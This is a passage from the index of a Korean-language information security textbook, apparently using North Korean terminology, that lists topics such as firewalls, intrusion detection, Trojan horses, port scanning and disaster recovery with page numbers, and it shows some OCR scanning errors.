정보보안봉사 360 
정보보안체계 154, 360 
정보분류 61, 313, 415 
정보수집 54, 381, 393, 401, 487, 575, 610 
정보총괄책임자 ( CIO : Chief Information 
Officer ) 273 

정보체계 ( IS ) 보안양성 프로그람 286 
정보체계 ( IS ) 전문가 602 
정보체계 보안공학편람 412, 413, 419 
정보체계에 대한 물리적보호 636 
정보체계에서 물리적위협과 그 통제 
방법 636 

정보체계의 분류 636 
정보통신 32, 33, 63, 73, 111, 197, 238, 
239, 242, 245, 249, 252 

정보의 속성 489 

정상상태 검사방화벽 179, 180, 181, 182 
정성적위험분석 5, 347, 348 

정의 허위률 540 
조심성의 의무 307 
조작체 계 기 록파일 394, 395 
조작체계 판본조종 163 
조작체계이미지 100 
조작체계와 보강준위 148 
좀비 ( Zombie ) 35 





좀비 주소목록파일 36 

종업원자료기지 레쿄드 527 

주민분포별정보 22 

주소변환규약 42, 98 

주파수분할다중접 근 ( FDMA ) 113 

주요 정보기술계획 269, 378 

주요원 거 리 틍신 사업 자 (telecom carriers ) 144 

중간자료보관고 497, 506 

중계공격 35, 40 

중계공격실행 41 

중계기체계 212, 217 

중앙집권적인증 376 

중앙처리장치 147 

지구적이 동릉신체계 ( GSM ) 115 

지령해석기 102, 103 

지문검출박편 15 

지문수감부 17 

지문안전잠금릉 20 

지불처리체계 598, 599 

지속성계획 하부구조 587 

지속성계획화 ( CP ) 579 

지속성계획 화측정 580 

지식기지 형침 입 탐지체계 385 

지식변화 553 

지식에 기초한 체계 539 

지식의 표현 및 활용 539 

지역경계경로기 245 

직결가격 112 

직결구내체계 30 

직결주문체계 231 

직결판매자 459 

직렬련결형구조 69 

직접접근열람 431, 435 

진단정보 22 

질문봉사안내소 140 

질적평가등급 337 

집선기 41, 務， 71, 80, 90, 241, 243 

집선장치 70 

재구성 530, 579, 588, 594 


재정거래 476 
재정검열흔적 27 

재정총괄책임자 ( CFO : Chief Financial 
Officer ) 321 

재해복구계획 260, 293, 596, 606, 630 
재해복구계획화 564, 579, 584 
제3자공격 ( man - in - the-middle attack ) 519 

제5부류비차페꼬임쌍선 79 
제안의뢰서 ( RFP ) 378 

大 

차페꼬임쌍선케 _( STP ) 83 
착공카드장치 455 

참조 ( reference ) 528 
참조형정의 458 
초기 및 평가단계 322 
초련결구조 474 
촉진적위험분석 362 
추적가능성 496, 501 
추적쿠키(仕 acking cookie ) 228 
침투시험 60, 154, 182, 331, 447 
침입탐지체계 ( IDS ) 36, 185, 351, 381 
책임관계 12, 25, 259, 269, 293, 307, 421, 652 
체 계 보안능력 성 숙모형 ( SSE - CMM ) 403 
최고 5 ᅥ용정지시간 ( MTD : Maximum 
Tolerable Downtime ) 359 
최저틍화량 (foot traffic ) 564 
취소명단 ( CRL ) 374 
취약성스캐너 35, 574, 575 
취약성자료 382, 397, 400 
취약성평가도구 570 
취약성，위협，위험 및 대응조치 334 

=\ 

카드읽기장치 32, 634, 643 
칸막이차페 UTP ( CsUTP ) 82 

칸막이 차페 꼬임 쌍선케 -( ScTP ) 82 
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쿄드분할다중접 근 ( CDMA ) 116 
콤퓨터공격도구 34 

콤퓨터범죄 52, 337, 346, 355, 361, 442, 446 
콤퓨터보안 210, 223, 269, 306, 330, 356, 
362, 418, 451, 652 

콤퓨터보안기초 412 

콤퓨터비루스 11, 63, 216 
콤퓨터전 반통제검 열 348 
콤퓨터애호가 67 
콤퓨터에 기초한 강습 ( CBT ) 289 
콤퓨터에 의한 업무처리 478 
쿠키 226, 236, 333, 434 
쿠키조작 430, 438 
크래커 ( cracker ) 472 
케 MTV ( CATV ) 77 
케 M 손상 86 
케블절단 85 


타원극선암호화 ( ECC ) 119 
탐색엔진 467, 575, 576, 577 
턱값함수 542, 543, 547 
턴빌화 ( tunneling ) 규약 131 
틍과암호구 ( passphrase ) 135 
통과암호추측값 37 
통과암호해 독도구 34, 38 
통과암호해제 프로그람 277 
통보문인증쿄드 ( MAC ) 374 
롬신교환방법 73 
롬신망기구 65 
롬신망기술 65 
롬신선로용량 35 
통신층보안 ( TLS ) 규약 120 
통표고리 71, 85, 98, 101 
통표고리형망 66, 81 
통표고 리 형 망구조 71 
롬표고리적응기 82 
통표관리 377 


투명성 143, 370, 423； 532 

투명한 GIF 화상 235 
투약정보 22 

트로이목마 48, 93, 135, 183,201, 216, 333, 
346, 386 

트랜잭션자료 476 
트랜잭션의 분석 476 
특권조작방식 102 
특수문자 37, 38 
태그언어 456, 457 
테라자료저장고 506 
텔비트 46, 97, 104, 105 

n 

파고 l ( desmiction ) 443 
파라메터수정 430, 435 
파케트려과 106, 133, 178, 182, 258, 392 
파케트려 과방화벽 178, 179, 180 

파케트려과장치 391 
파케트 방향 바꾸기 프로그람 40 
파케트범람 35 
파케트크기 147 
파일전송규약 153 
파일 체계 검사프로그람 49 
파일 체계 무결 성 검사도구 48 
파일암호작성 17 
판매자체계 459 
퍼쎔트론 542, 543, 546 
편의프로그람 135, 452, 530, 573, 612, 649 
포구거울화 (port mirroring ) 91 
포구스캔 38,164, 548 
포구스캔도구 34, 39 
표식형접근조종 490 
표준 PKI 계층구조 519 
표준접근목록 107, 108, 109 
표준일 반표식 언어 ( SGML:Standard 
Generalized Markup Language ) 457 
프로그람서고 416, 486 




프로그람방책과 주제방책 312 

프레임중계 (Frame Relay ) 239, 444 

플라그인 457, 513 

플래쉬기억 97, 103 
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열린언어 457 

열쇠관리 296, 372, 471, 519 
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유지보수 84, 136, 140, 150, 202, 379, 390, 
403, 423, 449, 488 

은거수법 47 

은행거래 65, 118 

은행구좌번호 17 
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